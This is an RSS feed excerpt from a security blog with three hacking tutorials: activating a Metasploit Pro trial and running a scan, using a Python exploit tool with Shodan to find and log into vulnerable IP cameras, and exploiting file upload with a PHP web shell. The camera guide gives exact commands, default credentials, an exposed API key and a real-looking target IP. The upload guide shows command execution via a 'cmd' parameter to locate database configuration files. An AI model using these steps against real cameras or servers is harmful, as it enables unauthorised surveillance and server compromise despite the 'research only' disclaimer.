<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2F4-thiet-lap-ssl.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-28473" src="https://anonyviet.com/wp-content/uploads/2021/07/4-thiet-lap-ssl.jpg" alt="laptop design" width="470" height="350" srcset="https://anonyviet.com/wp-content/uploads/2021/07/4-thiet-lap-ssl.jpg 470w, https://anonyviet.com/wp-content/uploads/2021/07/4-thiet-lap-ssl-300x223.jpg 300w" sizes="auto, (max-width: 470px) 100vw, 470px" title="How to Active Metasploit Pro to exploit security hole 23"/></a></p>
<p>Now click Next and wait for the installation to complete.  In the Welcome screen, click on the link https://localhost:3790.  Here is also the link to access the Metasploit Pro interface</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2F5-dang-nhap-Metasploit-Pro.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-28474" src="https://anonyviet.com/wp-content/uploads/2021/07/5-dang-nhap-Metasploit-Pro.jpg" alt="Importing Metasploit Pro" width="361" height="336" srcset="https://anonyviet.com/wp-content/uploads/2021/07/5-dang-nhap-Metasploit-Pro.jpg 361w, https://anonyviet.com/wp-content/uploads/2021/07/5-dang-nhap-Metasploit-Pro-300x279.jpg 300w" sizes="auto, (max-width: 361px) 100vw, 361px" title="How to Active Metasploit Pro to Exploit Vulnerability 24"/></a></p>
</p>
<p>If your browser has an SSL error, just click on <strong>Proceed to localhost (unsafe)</strong></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2F6-proceed-to-localhost.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-28475" src="https://anonyviet.com/wp-content/uploads/2021/07/6-proceed-to-localhost.jpg" alt="proceed to localhost" width="627" height="304" srcset="https://anonyviet.com/wp-content/uploads/2021/07/6-proceed-to-localhost.jpg 627w, https://anonyviet.com/wp-content/uploads/2021/07/6-proceed-to-localhost-300x145.jpg 300w" sizes="auto, (max-width: 627px) 100vw, 627px" title="How to Active Metasploit Pro to Exploit Vulnerability 25"/></a></p>
<p>Next you create a user/password to log into Metasploit Pro.  This is only a Local account, you can order later, name and password are free.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2F7-tao-user.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-28476" src="https://anonyviet.com/wp-content/uploads/2021/07/7-tao-user.jpg" alt="create user metasploit pro" width="662" height="260" srcset="https://anonyviet.com/wp-content/uploads/2021/07/7-tao-user.jpg 662w, https://anonyviet.com/wp-content/uploads/2021/07/7-tao-user-300x118.jpg 300w" sizes="auto, (max-width: 662px) 100vw, 662px" title="How to Active Metasploit Pro to exploit security hole 26"/></a></p>
<p>Next is to enter the Key sent in the mail, select the line <strong>Enter Product Key You&#8217;ve Received by Email </strong>and click Active License.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2F8-Activate-Your-Metasploit-License.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-28477" src="https://anonyviet.com/wp-content/uploads/2021/07/8-Activate-Your-Metasploit-License.jpg" alt="Activate Your Metasploit License" width="485" height="232" srcset="https://anonyviet.com/wp-content/uploads/2021/07/8-Activate-Your-Metasploit-License.jpg 485w, https://anonyviet.com/wp-content/uploads/2021/07/8-Activate-Your-Metasploit-License-300x144.jpg 300w" sizes="auto, (max-width: 485px) 100vw, 485px" title="How to Active Metasploit Pro to exploit security hole 27"/></a></p>
<p>That&#8217;s it, you have activated the 14-day Key for Metasploit Pro for free.  To test a target vulnerability scan, select <strong>Quick Pentest</strong></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fquick-pentest.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-28478" src="https://anonyviet.com/wp-content/uploads/2021/07/quick-pentest.jpg" alt="quick pentest" width="571" height="425" srcset="https://anonyviet.com/wp-content/uploads/2021/07/quick-pentest.jpg 571w, https://anonyviet.com/wp-content/uploads/2021/07/quick-pentest-300x223.jpg 300w" sizes="auto, (max-width: 571px) 100vw, 571px" title="How to Active Metasploit Pro to exploit security hole 28"/></a></p>
<p>Next, name the Project, Enter the IP to be scanned in the box <strong>Target Address</strong>.  Press <strong>Start Scan</strong></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2F9-quick-scan.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-28479" src="https://anonyviet.com/wp-content/uploads/2021/07/9-quick-scan.jpg" alt="  quick scan" width="576" height="404" srcset="https://anonyviet.com/wp-content/uploads/2021/07/9-quick-scan.jpg 576w, https://anonyviet.com/wp-content/uploads/2021/07/9-quick-scan-300x210.jpg 300w" sizes="auto, (max-width: 576px) 100vw, 576px" title="How to Active Metasploit Pro to exploit security vulnerability 29"/></a></p>
<p>Now sit back and wait for the security hole scan.  When there is a vulnerability, the program will automatically generate a report for you.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fcach-dung-dung-metasploit-pro-1.jpg" rel="noopener" class="local-link"><img post-id="3759" fifu-featured="1" decoding="async" loading="lazy" class="aligncenter size-full wp-image-28480" src="https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-metasploit-pro-1.jpg" alt="How to Active Metasploit Pro to Exploit Vulnerabilities" title="How to Active Metasploit Pro to Exploit Vulnerabilities" width="852" height="395" srcset="https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-metasploit-pro-1.jpg 852w, https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-metasploit-pro-1-300x139.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-metasploit-pro-1-768x356.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-metasploit-pro-1-750x348.jpg 750w" sizes="auto, (max-width: 852px) 100vw, 852px" title="How to Active Metasploit Pro to exploit security hole 30"/></a></p>
<p>In addition, the program has built-in automatic exploitation feature when detecting vulnerabilities.  I will write in the next part (if this part has many people interested).</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;28451&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-active-metasploit-pro-to-exploit-vulnerabilities/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-metasploit-pro-1.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>How to use Netwave-GoAhead Exploit to exploit security camera vulnerabilities</title>
		<link>https://en.anonyviet.com/how-to-use-netwave-goahead-exploit-to-exploit-security-camera-vulnerabilities/</link>
					<comments>https://en.anonyviet.com/how-to-use-netwave-goahead-exploit-to-exploit-security-camera-vulnerabilities/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 25 Jan 2023 22:59:59 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Camera]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[NetwaveGoAhead]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=3410</guid>

					<description><![CDATA[In the article &#8220;Exercise: Use ZoomEye to access the vulnerable Camera CVE-2018-9995“We can easily find many cameras that still have unpatched vulnerabilities. However, there is still a Tool called Netwave-GoAhead Exploit that helps to find another type of Vulnerable Security Camera. Join the channel Telegram of the AnonyViet 👉 Link 👈 About Tools This tool [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>In the article &#8220;<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fdung-zoomeye-hack-camera-bi-lo-hong-cve-2018-9995%2F" rel="noopener" class="local-link">Exercise: Use ZoomEye to access the vulnerable Camera CVE-2018-9995</a>“We can easily find many cameras that still have unpatched vulnerabilities.  However, there is still a Tool called Netwave-GoAhead Exploit that helps to find another type of Vulnerable Security Camera.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h3 id="ftoc-gioi-thieu-ve-tool" class="ftwp-heading">About Tools</h3>
<p>This tool was created and developed by Kien Quoc.  The tool has the main function of finding IP and checking 2 types of Cameras, Netware IP and GoAhead, to see if there are any vulnerabilities.  From there hack into the camera and view the camera through your Browser.</p>
<h3 id="ftoc-huong-dan-cach-su-dung-netwave-goahead-exploit" class="ftwp-heading">Instructions on how to use Netwave-GoAhead Exploit</h3>
<p style="text-align: center;"><span style="color: #0000ff;"><strong>Note: the article is for research purposes only, it is strictly forbidden to use it for illegal purposes.  In case the camera is found to be flawed, immediately notify the owner to quickly fix it.</strong></span></p>
<h4 id="ftoc-cai-dat-tool" class="ftwp-heading">Install tools</h4>
<p><strong>Step 1</strong>: Update your Linux and install Python 3 and Pip 3 for me</p>
<p><code>sudo apt update<br /></code><code>sudo apt install Python3.9.6 </code><br />(The latest version since the release of this article is 3.9.6. You can check it out on the Python homepage!)<br /><code>sudo apt-get update<br /></code><code>sudo apt-get -y install python3-pip</code></p>
<p><strong>Step 2</strong>: Install Netware-GoAhead Exploit tool</p>
<p><code>sudo git clone https://github.com/kienquoc102/Netwave-GoAhead-Exploits </code></p>
<p><strong>Step 3</strong>: Go to the file and install the necessary packages</p>
<p><code>cd Netwave-GoAhead-Exploits</code></p>
<p><code>pip3 install -r ./related.txt</code></p>
<h4 id="ftoc-dang-ki-tai-khoan-trong-shodan-io" class="ftwp-heading">Register an account in Shodan.io</h4>
<p>Shodan.io is a search engine that allows users to find specific types of computers connected to the internet using various filters.  In this article, Shodan acts as an ip finder and filter for you to see which ip can be attacked.</p>
<p><strong>Step 1</strong>: Go to Shodan.io <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fshodan.io%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here</a></p>
<p><strong>Step 2</strong>: Select SIGN UP NOW</p>
<p><strong>Step 3</strong>: Select Register in the upper corner</p>
<p><strong>Step 4</strong>: Enter login information</p>
<p><img decoding="async" class="size-full wp-image-32975 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/08/a-78.jpg" alt="Enter Shodan.io login information" width="879" height="627" title="How to use Netwave-GoAhead Exploit to exploit security camera vulnerability 13"/></p>
<p><strong>Step 5</strong>: Go to email Verify with Shodan.io</p>
<p><strong>Step 6</strong>: Go to account.shodan.io <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Faccount.shodan.io%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here.</a></p>
<p>Pay attention to the API key</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-32977 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/08/a-80.jpg" alt="Shodan API key" width="950" height="472" srcset="https://anonyviet.com/wp-content/uploads/2021/08/a-80.jpg 950w, https://anonyviet.com/wp-content/uploads/2021/08/a-80-300x149.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/08/a-80-768x382.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/08/a-80-360x180.jpg 360w, https://anonyviet.com/wp-content/uploads/2021/08/a-80-750x373.jpg 750w" sizes="auto, (max-width: 950px) 100vw, 950px" title="How to use Netwave-GoAhead Exploit to exploit security camera vulnerability 14"/></p>
<h4 id="ftoc-tim-camera-co-lo-hong-bang-shodan-api-key" class="ftwp-heading">Find Vulnerable Cameras with Shodan API key</h4>
<p><strong>Enter the following command</strong></p>
<p><code> python3 exploit.py -b 2 -v --shodan [nhập cái API key của shodan vào đây]</code></p>
<p><strong>My example would be </strong></p>
<p><code> python3 exploit.py -b 2 -v --shodan  rrgYhgIMtnrPtfKdiVvWKtyQyY94goA0</code></p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-32978 size-full" src="https://anonyviet.com/wp-content/uploads/2021/08/a-81.jpg" alt="run Netwave-GoAhead Exploit" width="615" height="61" srcset="https://anonyviet.com/wp-content/uploads/2021/08/a-81.jpg 615w, https://anonyviet.com/wp-content/uploads/2021/08/a-81-300x30.jpg 300w" sizes="auto, (max-width: 615px) 100vw, 615px" title="How to use Netwave-GoAhead Exploit to exploit security camera vulnerability 15"/></p>
<p>It will run as follows</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-32979 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/08/a-82.jpg" alt="Run Tool" width="645" height="511" srcset="https://anonyviet.com/wp-content/uploads/2021/08/a-82.jpg 645w, https://anonyviet.com/wp-content/uploads/2021/08/a-82-300x238.jpg 300w" sizes="auto, (max-width: 645px) 100vw, 645px" title="How to use Netwave-GoAhead Exploit to exploit the 16 . Security Camera vulnerability"/></p>
<p>The task you just need to wait for it to produce such results</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-32980 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/08/a-83.jpg" alt="Camera search results" width="443" height="84" srcset="https://anonyviet.com/wp-content/uploads/2021/08/a-83.jpg 443w, https://anonyviet.com/wp-content/uploads/2021/08/a-83-300x57.jpg 300w" sizes="auto, (max-width: 443px) 100vw, 443px" title="How to use Netwave-GoAhead Exploit to exploit security camera vulnerability 17"/></p>
<p>Now I will try to log in to ip address 181.56.97.61 with port 80</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-32981 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/08/a-84.jpg" alt="Enter username and password" width="562" height="310" srcset="https://anonyviet.com/wp-content/uploads/2021/08/a-84.jpg 562w, https://anonyviet.com/wp-content/uploads/2021/08/a-84-300x165.jpg 300w" sizes="auto, (max-width: 562px) 100vw, 562px" title="How to use Netwave-GoAhead Exploit to exploit security camera vulnerability 18"/></p>
<p>It will prompt you to enter your username and password.  Just based on what the tool says</p>
<p>An example of this would be</p>
<ul>
<li><strong>Username</strong>: admin</li>
<li><strong>Password</strong>: 123456</li>
</ul>
<p><strong>Result</strong></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-32982 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/08/a-85.jpg" alt="Camera hacking results" width="1068" height="532" srcset="https://anonyviet.com/wp-content/uploads/2021/08/a-85.jpg 1068w, https://anonyviet.com/wp-content/uploads/2021/08/a-85-300x149.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/08/a-85-1024x510.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/08/a-85-768x383.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/08/a-85-360x180.jpg 360w, https://anonyviet.com/wp-content/uploads/2021/08/a-85-750x374.jpg 750w" sizes="auto, (max-width: 1068px) 100vw, 1068px" title="How to use Netwave-GoAhead Exploit to exploit security camera vulnerability 19"/> <img post-id="3410" fifu-featured="1" decoding="async" loading="lazy" class="size-full wp-image-32983 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/08/b-5.jpg" alt="How to use Netwave-GoAhead Exploit to exploit security camera vulnerabilities" title="How to use Netwave-GoAhead Exploit to exploit security camera vulnerabilities" width="674" height="512" srcset="https://anonyviet.com/wp-content/uploads/2021/08/b-5.jpg 674w, https://anonyviet.com/wp-content/uploads/2021/08/b-5-300x228.jpg 300w" sizes="auto, (max-width: 674px) 100vw, 674px" title="How to use Netwave-GoAhead Exploit to exploit 20 . Security Camera vulnerability"/></p>
<p>Sometimes you will encounter some cases like this</p>
<p><code> [+]The ip:192.168.120.1,port:81,username:Location: /admin (Example IP)</code><br /><code>[+]The ip:192.168.120.1,port:81,password:&lt;meta name="generator" content="vBulletin 5.5.4" /&gt;</code></p>
<p>For this ip, please help me remove it because it is not the IP Address of the Camera</p>
<h4 id="ftoc-truy-cap-camera-su-dung-ip-co-san" class="ftwp-heading">Access Camera using available IP</h4>
<h5>With 1 IP address available port</h5>
<p>You run yourself the following command</p>
<p><code>python3 exploit.py -b 1 -i [IP:PORT] -v </code></p>
<p>For example, I have</p>
<p><code>python3 exploit.py -b 1 -i 192.168.1.5:80 -v</code></p>
<p>Inside</p>
<p><strong>IP address</strong> is 192.168.1.5</p>
<p><strong>Port</strong> is 80</p>
<h5>With IP list with port</h5>
<p>You use the following command for yourself</p>
<p><code>python3 exploit.py -b 2 -l iplist.txt -v</code></p>
<p>Inside</p>
<p>iplist.txt is the file containing the ip address in the form: [IP:PORT]
</p>
<p><strong>Eg</strong>: 192.168.1.5:80</p>
<p><strong>Target IP</strong> : 192.168.1.5</p>
<p><strong>Port aimed at</strong>: 80</p>
<p>For this way, it will be easy to attack on an address that you already know or if you have an IPlist available, using the following way to check is a very effective way.  Using Shodan is also possible but it will check for many strange ips that have been published on the network.</p>
<p><strong>So I just finished the tutorial on how to find and attack the camera with the Python tool.  If you have a good article, don&#8217;t hesitate to send an article contribution via email <code>anonyviet.com@gmail.com</code>, we will edit and post it.  See also: Exercise: Use ZoomEye to find vulnerable cameras CVE-2018-9995 <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fdung-zoomeye-hack-camera-bi-lo-hong-cve-2018-9995%2F" rel="noopener" class="local-link">here.</a></strong></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;32972&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-use-netwave-goahead-exploit-to-exploit-security-camera-vulnerabilities/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/08/b-5.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>How to exploit File Upload vulnerability</title>
		<link>https://en.anonyviet.com/how-to-exploit-file-upload-vulnerability/</link>
					<comments>https://en.anonyviet.com/how-to-exploit-file-upload-vulnerability/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 25 Jan 2023 19:58:41 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[file]]></category>
		<category><![CDATA[Upload]]></category>
		<category><![CDATA[vulnerability]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=3269</guid>

					<description><![CDATA[Although not on the list Top 10 web security vulnerabilities according to OWASP 2020 announcement but File Upload is still an extremely dangerous vulnerability that you should be careful of. File Upload is a favorite target for hackers, as it requires your website to upload large amounts of data and write it to disk. Join [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>Although not on the list <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Ftop-10-lo-hong-bao-mat-web-theo-cong-bo-owasp-2020%2F" rel="noopener" class="local-link">Top 10 web security vulnerabilities according to OWASP 2020 announcement</a> but File Upload is still an extremely dangerous vulnerability that you should be careful of.  File Upload is a favorite target for hackers, as it requires your website to upload large amounts of data and write it to disk.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img decoding="async" class="aligncenter wp-image-27226 size-full" src="https://anonyviet.com/wp-content/uploads/2021/05/212.png" alt="How to exploit File Upload vulnerability" width="524" height="243" srcset="https://anonyviet.com/wp-content/uploads/2021/05/212.png 524w, https://anonyviet.com/wp-content/uploads/2021/05/212-300x139.png 300w" sizes="(max-width: 524px) 100vw, 524px" title="How to exploit File Upload 15 . vulnerability"/></p>
<p>This creates an opportunity for attackers to inject malicious scripts into your server.  If hackers can figure out how to execute those scripts, they can compromise your entire system.</p>
<p>So, in this article, I will show you how the File Upload vulnerability works through a real example.</p>
<h2 id="ftoc-cach-lo-hong-file-upload-hoat-dong" class="ftwp-heading">How File Upload Vulnerability Works</h2>
<p>Ellyx13 is a hacker who signed up for a website that runs on a popular content management system (like WordPress, for example).</p>
<p>Ellyx13 found something interesting about the site&#8217;s avatar upload function.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-27227 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/05/213.png" alt="How to exploit File Upload 11 vulnerability" width="658" height="330" srcset="https://anonyviet.com/wp-content/uploads/2021/05/213.png 658w, https://anonyviet.com/wp-content/uploads/2021/05/213-300x150.png 300w, https://anonyviet.com/wp-content/uploads/2021/05/213-360x180.png 360w" sizes="auto, (max-width: 658px) 100vw, 658px" title="How to exploit File Upload 16 . vulnerability"/></p>
<p>First, uploaded files are not renamed as part of the upload process.  The original filename appears in the avatar profile URL.  Second, the site checks the file format with javascript.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-27228 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/05/214.png" alt="How to exploit File Upload 12 . vulnerability" width="898" height="567" srcset="https://anonyviet.com/wp-content/uploads/2021/05/214.png 898w, https://anonyviet.com/wp-content/uploads/2021/05/214-300x189.png 300w, https://anonyviet.com/wp-content/uploads/2021/05/214-768x485.png 768w, https://anonyviet.com/wp-content/uploads/2021/05/214-750x474.png 750w" sizes="auto, (max-width: 898px) 100vw, 898px" title="How to exploit File Upload vulnerability 17"/></p>
<p>Ellyx13 writes a simple script called <strong>hack.php</strong>.  When the website executes this PHP script, it will run any commands passed in the “cmd” parameter.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-27232 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/05/215-1.png" alt="How to exploit File Upload vulnerability 13" width="898" height="254" srcset="https://anonyviet.com/wp-content/uploads/2021/05/215-1.png 898w, https://anonyviet.com/wp-content/uploads/2021/05/215-1-300x85.png 300w, https://anonyviet.com/wp-content/uploads/2021/05/215-1-768x217.png 768w, https://anonyviet.com/wp-content/uploads/2021/05/215-1-750x212.png 750w" sizes="auto, (max-width: 898px) 100vw, 898px" title="How to exploit File Upload 18 . vulnerability"/></p>
</p>
<p>Ellyx13 disables JavaScript in her browser and uploads files <strong>hack.php</strong> make your avatar profile.  Since JavaScript is disabled, the file format will not be checked.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-27230 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/05/216.png" alt="How to exploit File Upload 14 . vulnerability" width="894" height="448" srcset="https://anonyviet.com/wp-content/uploads/2021/05/216.png 894w, https://anonyviet.com/wp-content/uploads/2021/05/216-300x150.png 300w, https://anonyviet.com/wp-content/uploads/2021/05/216-768x385.png 768w, https://anonyviet.com/wp-content/uploads/2021/05/216-360x180.png 360w, https://anonyviet.com/wp-content/uploads/2021/05/216-750x376.png 750w" sizes="auto, (max-width: 894px) 100vw, 894px" title="How to exploit File Upload vulnerability 19"/></p>
<p>No wonder Ellyx13&#8217;s avatar profile can&#8217;t be displayed, because the file I uploaded is not a valid image file. <strong>However, the hack.php script is currently live on the server.</strong></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-27231 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/05/217.png" alt="How to exploit File Upload 15 . vulnerability" width="895" height="451" srcset="https://anonyviet.com/wp-content/uploads/2021/05/217.png 895w, https://anonyviet.com/wp-content/uploads/2021/05/217-300x151.png 300w, https://anonyviet.com/wp-content/uploads/2021/05/217-768x387.png 768w, https://anonyviet.com/wp-content/uploads/2021/05/217-360x180.png 360w, https://anonyviet.com/wp-content/uploads/2021/05/217-750x378.png 750w" sizes="auto, (max-width: 895px) 100vw, 895px" title="How to exploit File Upload 20 . vulnerability"/></p>
<p>Now, you just need to change the URL of the avatar profile in the browser address bar a little to make the hack.php script execute.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-27233 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/05/218.png" alt="How to exploit File Upload 16 . vulnerability" width="900" height="454" srcset="https://anonyviet.com/wp-content/uploads/2021/05/218.png 900w, https://anonyviet.com/wp-content/uploads/2021/05/218-300x151.png 300w, https://anonyviet.com/wp-content/uploads/2021/05/218-768x387.png 768w, https://anonyviet.com/wp-content/uploads/2021/05/218-750x378.png 750w" sizes="auto, (max-width: 900px) 100vw, 900px" title="How to exploit File Upload 21 . vulnerability"/></p>
<p>In fact, any command passed in the “cmd” parameter will be executed on the server.  Ellyx13&#8217;s file upload created a command execution vulnerability.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-27234 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/05/219.png" alt="How to exploit File Upload vulnerability 17" width="893" height="455" srcset="https://anonyviet.com/wp-content/uploads/2021/05/219.png 893w, https://anonyviet.com/wp-content/uploads/2021/05/219-300x153.png 300w, https://anonyviet.com/wp-content/uploads/2021/05/219-768x391.png 768w, https://anonyviet.com/wp-content/uploads/2021/05/219-750x382.png 750w" sizes="auto, (max-width: 893px) 100vw, 893px" title="How to exploit File Upload vulnerability 22"/></p>
<p>Now Ellyx13 has permission to execute commands on the web server.  At this point, I have the right to execute cmd commands to access sensitive data such as file location <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Ffilegi.com%2Ffile-info%2Fcnf-3299%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">my.cnf</a> to find the database configuration file for example.  By entering the command path: http://cdn.example.com/1a2fe/hack.php?cmd=locate+my.cnf</p>
